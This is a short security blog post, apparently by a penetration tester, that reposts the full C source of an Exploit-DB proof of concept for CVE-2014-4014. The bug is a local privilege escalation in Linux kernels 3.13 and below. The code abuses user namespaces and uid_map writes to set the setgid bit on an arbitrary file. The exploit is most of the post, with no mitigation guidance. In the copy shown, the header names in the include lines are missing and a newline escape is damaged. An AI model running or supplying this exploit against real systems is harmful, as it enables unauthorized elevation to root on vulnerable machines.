Linux Kernel Local Privilege Escalation PoC

  • 1
  •  
  •  
  •  
  •  
  •  
  •  
  •  
    1
    Share

Exploit-db have recently released a local privilege escalation POC as shown in the code example which affects the Linux 3.13 kernel and below.

Local attackers can exploit the issue to execute arbitrary code with elevated privileges or crash the system, effectively denying service to legitimate users.

/**
* CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
*
* Vitaly Nikolenko
* http://hashcrack.org
*
* Usage: ./poc [file_path]
* 
* where file_path is the file on which you want to set the sgid bit
*/
#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
struct args {
int pipe_fd[2];
char *file_path;
};
static int child(void *arg) {
struct args *f_args = (struct args *)arg;
char c;
// close stdout
close(f_args->pipe_fd[1]); 
assert(read(f_args->pipe_fd[0], &c, 1) == 0);
// set the setgid bit
chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
return 0;
}
int main(int argc, char *argv[]) {
int fd;
pid_t pid;
char mapping[1024];
char map_file[PATH_MAX];
struct args f_args;
assert(argc == 2);
f_args.file_path = argv[1];
// create a pipe for synching the child and parent
assert(pipe(f_args.pipe_fd) != -1);
pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
assert(pid != -1);
// get the current uid outside the namespace
snprintf(mapping, 1024, "0 %d 1n", getuid()); 
// update uid and gid maps in the child
snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
fd = open(map_file, O_RDWR); assert(fd != -1);
assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
close(f_args.pipe_fd[1]);
assert (waitpid(pid, NULL, 0) != -1);
}
The following two tabs change content below.

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

Leave a Reply